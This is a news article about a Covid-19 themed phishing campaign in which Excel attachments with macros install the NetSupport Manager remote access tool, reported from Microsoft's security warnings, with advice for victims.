Microsoft is warning users of a large Covid-19 themed phishing campaign that installs the NetSupport Manager remote administration tool to take complete control of a user’s system and even execute commands remotely.
The Microsoft Security Intelligence team provided additional details about this ongoing campaign in a series of tweets in which he stated that cybercriminals use malicious Excel attachments to infect users’ devices with a Remote Access Trojan (RAT).
The attack begins with potential victims receiving an email that impersonates the John Hopkins Center. This email purports to provide victims with an update on the number of coronavirus-related deaths in the United States. However, attached to the email is an Excel file that displays a graph showing the number of deaths in the United States.
When a user opens the Excel file, he invites him to “ Activate the content ” and, in doing so, executes the file malicious macros that download and install the NetSupport Manager client from a remote site.
Covid-19 themed phishing campaign
In one Tweeter, the Microsoft Security Intelligence team explained that all of the different Excel files used in the campaign all connect to the same URL, saying:
“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all connect to the same URL to download the payload. NetSupport Manager is known to be abused by attackers in order to remotely access and execute commands on compromised machines. “
Although NetSupport Manager is actually a legitimate remote administration tool, it is generally distributed among hacking communities that use it as RAT. Once a user unknowingly installs NetSupport Manager on their computer, it allows hackers to take complete control of the infected machine and execute commands remotely. The NetSupport Manager RAT is then used to further compromise a victim’s computer by installing additional tools and scripts.
Those who have been victims of this phishing campaign must assume that their data has been compromised and that hackers have attempted to steal their passwords. After the infected device is cleaned, users must change all their passwords and those belonging to other computers on their network.